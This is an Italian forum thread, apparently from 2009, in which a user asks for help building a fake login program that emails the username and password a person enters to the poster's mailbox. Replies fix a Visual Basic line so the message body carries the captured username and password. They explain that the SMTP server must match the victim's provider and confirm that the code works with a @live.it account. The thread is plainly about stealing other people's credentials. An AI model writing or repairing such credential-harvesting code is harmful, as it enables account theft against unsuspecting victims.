mannaialapeppa

Utente Medio
Autore del topic
21 Ottobre 2009
103
0
Miglior risposta
0
CIAO RAGA....
SONO 2 GIORNI CHE STO IMPAZZENDO PER CERCARE DI CREARE UN LOGIN CHE RECAPITI A ME VIA MAIL IL LOG EFFETTUTO DALL'UTENTE :emoji_smiley::
LO SO CHE è UNA LAMERATA SE USATA IN MODO SBAGLIATO MA E SOLO A SCOPO INFORMATIVO....
MI SERVIREBBE IL CODICE X FAR RICEVERE I LOG SULLA MIA CASELLA DI POSTA MI SERVIREBBE TUTTO IL CODICE GUARDATE IO COSA HO MESSO MA NON VA... DOVE SBAGLIO???


Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

PERFAVORE AIUTATEMI NON SO COSA FARE :morvo:
 
Se non funziona il problema è dovuto all'operatore che voi usate. Perchè il codice è giusto. Se non avete Alice, allora non dovete mettere come SMTP out.alice.it, ma quello del vostro operatore ( se dovete usarlo voi ). Altrimenti se dovete inviarlo alla vittima, deve essere lui ad avere quel determinato SMTP. Se lui ha per esempio Fastweb, non funzionerà. Dovreste mettere nel codice l'SMPT di Fastweb.

Ps : Questo codice è sbagliato :

MailMessage.Body = " textbox1.text & textbox2.txt

Dovresti mettere : MailMessage.Body = "L'username è " & TextBox1.Text & " La password è " & TextBox2.text

Ciao.
 
Grazie System ma il codice e che ho fatto io aiutandomi con quello che mi hai dato tu su msn e sbagliato tutto
Killer Grz Mille spero che funga lo provo e ti dico
 
Grazie System ma il codice e che ho fatto io aiutandomi con quello che mi hai dato tu su msn e sbagliato tutto
Killer Grz Mille spero che funga lo provo e ti dico

Certo che funge però ricorda l'utilizzo di un contatto @live.it e ricorda anche di non cambiare l'stmp.